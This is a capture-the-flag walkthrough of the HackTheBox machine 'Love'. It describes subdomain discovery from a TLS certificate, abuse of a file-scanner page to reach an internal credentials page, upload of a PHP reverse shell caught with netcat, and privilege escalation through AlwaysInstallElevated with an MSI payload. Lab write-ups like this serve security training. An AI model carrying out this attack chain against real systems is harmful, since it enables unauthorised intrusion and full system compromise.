Love is an Easy box from HTB and created by pwnmeow. This box features subdomain lookup and
AlwaysInstallElevated privesc. I start every scan with an RustScan and convert it to a
PDF for easier viewing. This is bundled into my setup.sh script which I’ve mentioned in a few of my other posts. RustScan with
NMAP filters shows a website with registration available on
Port 80. I also notice
Port 443 is open so I navigate over to the
HTTPS version of the website. I see a certificate with some useful information.
Port 80 showing the Voting System screen.
HTTPS Certificate showing some useful information.
Seeing the certificate I notice a subdomain. I add the primary domain and the subdomain to my host file.
Adding sub-domain to my host file.
I also note down the
[email protected] address as possible username and ValentineCorp as a possible company. I visit both domains with
HTTPS and get a pop on the staging website.
Staging File Scanner website.
I notice at the top of the screen that a Demo link is available. I setup a
nc listener and click Scan file I get a hit back showing that code execution via RFI or traversal might be possible.
After striking out for a few minutes my
NMAP scan finishes. Reviewing the results I notice that
Port 5000 is running a website and giving a 403 Error.
Port 5000 showing
I use the file scanner to navigate to the page and pick up the credentials for the voting system.
Free File Scanner shows the Password Dashboard.
I note down the credentials in my notes and head over to the voting page. Upon logging in I note down the name of the user we are logged in as and notice the Copyright for the site says 2018. As this box came out in 2021 we can assume this is intentional.
Google showing me the way…
After viewing the ExploitDB article I was unable to get a response. Instead I tried the exploit manually which worked.
Creating a new malicious candidate.
I created a Candidate and uploaded a
shell.php which is a fork of the PenTestMonkey
PHP reverse shell. To catch the shell I setup a
nc listener –
Once on the system I get the user flag and create a directory in the
Windows\Temp directory and download WinPEAS to the box. The scan comes back that
AlwaysInstallElevated is enabled.
LinPEAS showing AlwaysInstallElevated.
I kill the session for the
PHP shell and change the port to
9001. This is because my setup script creates
MSFVenomshells that default to
Port 1234. I alter the
PHP shell and get back into the environment. I then pull the
.MSI shell I have to perform the privilege escalation.